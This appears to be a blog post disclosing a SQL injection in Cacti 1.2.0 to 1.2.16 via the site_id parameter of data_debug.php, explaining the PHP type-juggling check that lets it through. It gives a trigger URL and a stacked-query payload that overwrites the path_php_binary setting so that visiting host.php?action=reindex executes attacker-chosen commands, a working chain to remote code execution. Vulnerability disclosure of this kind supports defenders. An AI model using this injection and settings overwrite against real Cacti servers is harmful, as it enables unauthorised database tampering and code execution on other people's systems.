Cacti 1.2.0 to 1.2.16 SQL Injection

This one is pretty straight forward and was found pretty quick

An SQL injection in the latest version of cacti.

In order to trigger the vulnerability you just need to enter this url: cacti/data_debug.php?action=ajax_hosts&site_id=11SQLInjection

Because of how PHP behaves, the check:

if (get_request_var('site_id') > 0) {
$sql_where = 'site_id = ' . get_request_var('site_id');
}

will pass when the parameter starts with a number, and in the end the system will try to execute the following query:

SELECT h1.*
FROM host AS h1
INNER JOIN (SELECT DISTINCT id
FROM (SELECT h.*, uap0.user_id AS user0, uap1.user_id AS user1, uap2.user_id AS user2
FROM host AS h
LEFT JOIN graph_local AS gl ON h.id = gl.host_id
LEFT JOIN graph_templates_graph AS gtg ON gl.id = gtg.local_graph_id
LEFT JOIN graph_templates AS gt ON gt.id = gl.graph_template_id
LEFT JOIN host_template AS ht ON h.host_template_id = ht.id
LEFT JOIN user_auth_perms AS uap0
ON (gl.id = uap0.item_id AND uap0.type = 1 AND uap0.user_id = 1)
LEFT JOIN user_auth_perms AS uap1
ON (gl.host_id = uap1.item_id AND uap1.type = 3 AND uap1.user_id = 1)
LEFT JOIN user_auth_perms AS uap2
ON (gl.graph_template_id = uap2.item_id AND uap2.type = 4 AND
uap2.user_id = 1)
WHERE site_id = 11sql_injection) AS rs1) AS rs2 ON rs2.id = h1.id;
select 1 # AND hostname LIKE '%hostname%' OR description LIKE '%description%' OR notes LIKE '%notes%' AND h.disabled=""
HAVING (user0 IS NULL OR (user1 IS NULL OR user2 IS NULL)) ) AS rs1 ) AS rs2
ON rs2.id=h1.id
ORDER BY description LIMIT 30

If we will execute something like this:cacti/data_debug.php?action=ajax_hosts&site_id=11) AS rs1   ) AS rs2   ON rs2.id=h1.id;update settings set value=’php -r “file_put_contents(\’/tmp/a\’,\’aaa\’); “‘ where name=’path_php_binary’;– –
We will manage to execute code when we will visit /cacti/host.php?action=reindex

Leave a Reply

Your email address will not be published. Required fields are marked *